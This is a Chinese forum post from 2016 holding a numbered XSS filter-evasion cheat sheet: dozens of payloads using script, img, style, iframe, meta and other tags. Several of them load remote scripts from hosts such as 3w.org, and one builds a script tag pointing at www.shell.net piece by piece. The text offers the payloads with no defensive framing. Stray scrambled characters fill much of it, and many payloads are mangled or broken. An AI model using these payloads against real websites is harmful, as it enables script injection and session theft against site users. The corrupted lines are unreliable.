(1)普通的XSS JavaScript注入9 q; b0 _# \% M3 A# M0 Y; H; J
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. i( ~) u9 v/ w1 ?$ s
(99)另类弹框& f6 }" ]+ ]& x' I. U3 O$ t- e
<q/oncut=alert()>1
7 J8 f9 a J9 r4 L3 K+ R+ U<s/onclick=alert()>b+ a/ X# l3 ~6 @ `" d8 Q
<XSS=" onclick="alert(1)//">clickme</SSX=">
) P" D/ ~; t7 f4 Z1 [+ l9 ?8 C/ M <zzz onclick=alert`1`>clickme</zzz> % F7 z6 l$ P- f: p6 ~ M+ y6 [
<a onclick=alert`1`>clickme</a>
( p9 ] C% j& [( @<a=">clickme</a=">
5 P4 _. h; V# Y& R* p<a=">clickme</a>
! x3 D1 Z/ n5 P0 {5 J+ _# O9 W<z=">clickme</z=">* @9 r; ^1 |4 u& u
<z onclick=alert`1`>clickme</z>, _/ ~& A2 a! W% W' _
3 C, G6 q; [8 u* O# o- E' Y0 v" z(2)IMG标签XSS使用JavaScript命令
) \0 b& [, a' y# {" G<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ P% O+ v6 }) t- R
# |- R" A+ p' G2 W
(3)IMG标签无分号无引号
1 y3 l0 l% e) h0 [<IMG SRC=javascript:alert(‘XSS’)>; |. V; P- y" H2 u9 N, z" W# x
% @9 y: |0 D- ]8 Z0 S4 R9 [3 a(4)IMG标签大小写不敏感
$ H1 l* r# W+ ~7 `8 b% {7 G<IMG SRC=JaVaScRiPt:alert(‘XSS’)>* F, I' {4 P3 m. B7 V
/ ~1 W$ T% z q1 Y* y# w
(5)HTML编码(必须有分号)& N3 y1 L9 Y9 f/ `( K
<IMG SRC=javascript:alert(“XSS”)>
3 F3 i+ B; W w# q( T. }4 U y
' G' z; S s) v% W(6)修正缺陷IMG标签
0 m7 ]! o& w% H/ t1 @( X6 |<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
4 {" C' z; v* h; J3 T0 H% _8 B* g T' c. ?) w: s/ g
(7)formCharCode标签(计算器)3 E5 [# n5 [6 `2 c2 d8 M
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> q* Z4 {: W3 J! n% _
* O8 r+ @4 @3 k/ k( Z2 T% q(8)UTF-8的Unicode编码(计算器)1 s8 b1 K: G# C; k8 U
<IMG SRC=jav..省略..S')>* O4 p- y; q: i* w
. f! t E. B% O
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)( O2 Y5 K l0 c
<IMG SRC=jav..省略..S')>
1 q/ T3 t- C& `) P9 f* U& A) _0 D d4 P
(10)十六进制编码也是没有分号(计算器)5 r/ p, X( F, {/ X" R! Z
<IMG SRC=\'#\'" /span>
& p6 i' W0 l5 t' i; _- u f% @0 J5 l
(11)嵌入式标签,将Javascript分开) ]! | Q! W( }, C
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>1 r- r1 Q" K( S
$ x' S% r" z& r& r
(12)嵌入式编码标签,将Javascript分开
. q" k7 _) U3 @/ q' u5 Q! @<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, f' C1 y. |3 J, Q' M
3 J G' V. L; I* Q& h(13)嵌入式换行符0 Q. V. V( H4 {) ^) h9 \" u( A2 _
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' J: U8 ^) v& r0 |/ q5 \% q F% }& N0 v' \
; e1 k# h% J1 Z0 H(14)嵌入式回车
; H: ?* N0 O/ F0 R8 s<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 r* L% \7 n u
9 j* [7 v# x4 m- p(15)嵌入式多行注入JavaScript,这是XSS极端的例子! |) e8 K7 \" C
<IMG SRC=\'#\'" /span>
* ^0 n' q4 X8 U7 Q$ v! F
% |- n* F, e H) f2 X* \( M(16)解决限制字符(要求同页面)+ V) c0 Q6 A! o' f
<script>z=’document.’</script>. |. ^. H& o5 Q
<script>z=z+’write(“‘</script>5 Z8 D; O, D/ Y/ f( h S
<script>z=z+’<script’</script>
, {- R# q. `# B6 G0 F<script>z=z+’ src=ht’</script>
5 Z7 F4 [" A( `/ R7 {2 u<script>z=z+’tp://ww’</script>
0 s# J2 ~) n, w: Y, T<script>z=z+’w.shell’</script>" ^! n# X; q1 `* J9 B
<script>z=z+’.net/1.’</script>+ \3 U& v- d2 s5 ]
<script>z=z+’js></sc’</script>4 G; p$ [- B8 G. a- W s+ ~
<script>z=z+’ript>”)’</script>, `) E0 P8 R" h! i3 S: T) u$ s/ q
<script>eval_r(z)</script>! X+ r1 v: q+ h S3 s! F' e
7 g; C. N d4 q8 O; i0 C(17)空字符
9 Q7 M1 f% E$ M( Nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out* @5 I' d8 d6 y+ D4 h* u" G; S, d
W% ^' `& W' _" H9 q, f5 ]$ |(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 j8 \5 A: P- T) N/ q. }, c
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
8 H9 x2 X" N \6 h* R5 t9 e% L% E
) c# r9 F- ^( [, s5 C, r(19)Spaces和meta前的IMG标签
$ [) j( u# g8 e: m1 {<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
0 @$ W' n1 Y0 `1 U o2 v$ U( q* W+ O* y$ p5 ~- i1 S0 W
(20)Non-alpha-non-digit XSS
2 g: ~& t `/ A<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>6 L: d4 l7 }- h7 p
# S! R& o/ b5 |5 j(21)Non-alpha-non-digit XSS to 22 |# B% v! b/ _5 A9 a
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>* _3 y# D) v: [5 e
7 n+ _/ f3 x: F$ ^6 q6 F) N! y
(22)Non-alpha-non-digit XSS to 3' D+ F$ t2 Q& M
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
. c$ U/ y: P$ }$ R) k, a3 h& W1 f. q0 J+ c3 s- B
(23)双开括号
' I) W9 I7 J# i0 K<<SCRIPT>alert(“XSS”);//<</SCRIPT>9 c4 }! C6 M$ Q+ ^1 [
8 p3 P" t1 }7 v; Y. i
(24)无结束脚本标记(仅火狐等浏览器)" B; K" y: k' R5 I% p
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>$ V! S; \3 j+ U) {! J
! g9 Y- e# n7 X' C8 p o* y
(25)无结束脚本标记2
& A3 a" v5 o5 }# T<SCRIPT SRC=//3w.org/XSS/xss.js>
; E- {' e$ r7 m2 R3 t5 L' b2 t6 i8 u* Q; U2 D, Z/ J
(26)半开的HTML/JavaScript XSS( H7 K# |# }- D- ~, B1 V
<IMG SRC=\'#\'" /span>% Y! L+ O C t; O% m6 k
8 w# S/ l+ I) I0 x' j! P. ~
(27)双开角括号
0 O; Z6 o" v* \: Y$ K4 g) }<iframe src=http://3w.org/XSS.html <
5 D2 \& F/ i2 e: i( h6 `/ g
0 h2 F1 ]+ \- `" {1 u! A0 Q3 a$ f(28)无单引号 双引号 分号+ k' l5 [' t+ [# G5 S" D
<SCRIPT>a=/XSS/8 K$ Q8 W# V: T. y$ W7 L
alert(a.source)</SCRIPT># _- a4 j9 `2 _ f8 g
5 e/ m9 G. E6 l4 s* l# d& `, Z
(29)换码过滤的JavaScript! z4 a' i2 K: y4 B* O# h1 m
\”;alert(‘XSS’);//
) w- Y5 [$ Z/ ~3 L9 P# E! s
% q+ X4 a* U& K( i0 d+ j(30)结束Title标签
# ~2 p. l+ C. e# J</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
9 _: E; {3 J E% O# ?* T) ~
8 n1 \2 I, S1 d' F: Y2 q(31)Input Image
. E0 |. Z9 `) p5 s9 U( S4 ?' X<INPUT SRC=\'#\'" /span>
y% ~4 z8 z, S# q2 a9 N9 n
, a5 G0 r; }) h7 A7 X(32)BODY Image; n7 K* o5 A) I& F! A* D
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
. M ]) |# u6 P, ]% T/ d& o" v. Q1 U0 \; `* j0 {
(33)BODY标签" S9 O [2 B* U$ u
<BODY(‘XSS’)>9 V: P9 d- ^4 K9 H: S7 w- W
8 ~0 j9 J# V2 W(34)IMG Dynsrc+ y& U$ @, Y: h. C) e
<IMG DYNSRC=\'#\'" /span>
0 u' [5 {, S9 h$ ]% f7 W. K( S$ E2 k( z- N6 c6 G6 o
(35)IMG Lowsrc; x. Z7 r) f' [4 a% m2 O1 ]" r6 G" w
<IMG LOWSRC=\'#\'" /span>
4 Q5 |: }5 y4 i" F8 v
/ L5 |$ K q" ^1 ^ l(36)BGSOUND, Q) m! h; @- U
<BGSOUND SRC=\'#\'" /span> \6 G) \( O% ?. J: B; {# E( K. S3 C
* |0 n. b$ y9 }, I
(37)STYLE sheet/ n; R/ E0 \% R ]
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
) _: c$ t6 m1 a; R& {! Q7 r5 V5 E; s3 s* P, i6 N
(38)远程样式表
8 E* t( L& k9 X5 D% Z<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ y6 i# W1 {; O/ l% \$ u% g5 Q3 A. F- c L5 F: H; R! ]9 N
(39)List-style-image(列表式)4 a. [7 r* o/ j1 x
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
8 g2 U5 X) d" Z# H5 a0 {/ I, W& g1 p
(40)IMG VBscript
# h$ L5 M6 S) z9 _* K% o& L3 @4 ?<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
! U* Y( I1 K/ g' A6 U0 J
& |+ j/ X9 j# f( |5 V: I(41)META链接url
$ M" @: R1 P2 |<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
% B, p! {0 {" e+ a C. J: ?- O; Z# s$ n0 u; t+ K. f- B- t
(42)Iframe
# ]5 m- ~# d6 Y1 d- \% R<IFRAME SRC=\'#\'" /IFRAME>
* `. E& I9 ?5 p2 |
0 E. R& R# @, m) K1 f) H0 l& Z(43)Frame
1 M2 m: {$ o" C' z1 `<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>8 G2 R& R$ A1 R) s; v
; X s: V) f8 P0 M(44)Table+ H5 y+ X# M' [& P/ v" y1 P: b
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! }* D, y. q! L/ g: q
|$ P2 ]" a4 W/ Z4 Y5 R& f% C$ S
(45)TD0 s, n1 p8 W$ H+ j8 R
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 ^' _: C$ \2 x$ G! |1 h+ k
( Y; B- Z& b2 M8 D5 C$ Z(46)DIV background-image0 ]9 }8 ?. s/ s/ e- I8 L& h
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 l0 j8 i9 a$ t7 u
1 T' D. P! _& P# E) `' z) X
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ D5 E. K6 a. T( Y<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
5 V0 R# m& h) ?7 I% U
+ u \4 h! r) D$ V$ b" P(48)DIV expression- e7 }& j# [* I( _ S6 V/ f
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# |6 r* Q2 u0 n- M2 R) B, G$ E- L8 `* s, b
(49)STYLE属性分拆表达
7 n o' O0 L# c: ^, O0 T$ Q<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
0 n1 I+ a- ?3 F' I% x
# K" v, t& ^+ j1 T(50)匿名STYLE(组成:开角号和一个字母开头)% ]; d4 [+ o4 s E
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>1 l p9 z4 R! ^/ u* u" y
0 }0 V$ T& A2 Y. J- N4 h
(51)STYLE background-image
& ?5 Z) D' w8 Z# X, ]- h4 K% o<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>8 u' e% B7 O& ]) i. p
$ Q: G/ h! W' n: F5 H(52)IMG STYLE方式
+ g& v, ]3 n: m( ~2 s' }2 Pexppression(alert(“XSS”))’>7 ?+ v) K3 }! o- }" D
* n- q+ `% }) M% q- M! _& Y
(53)STYLE background
. l; b. \# Y+ L/ x" f( ^. v/ d<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>3 D- k5 y4 H5 e9 Y5 T9 N( W2 B' Z& B
5 n/ c4 q0 @. G3 B, x' I
(54)BASE
% m: x d' @3 X4 y! A& y<BASE HREF=”javascript:alert(‘XSS’);//”>: U" ?' y; i- d3 I; }( B- U
, {% i( Y1 f0 V7 I/ b! M* z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 e# |7 J; K. n, t1 N% X<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>+ V* a: ?' P0 H6 k
|
发表于 2016-4-28 10:06:15
收藏
支持
反对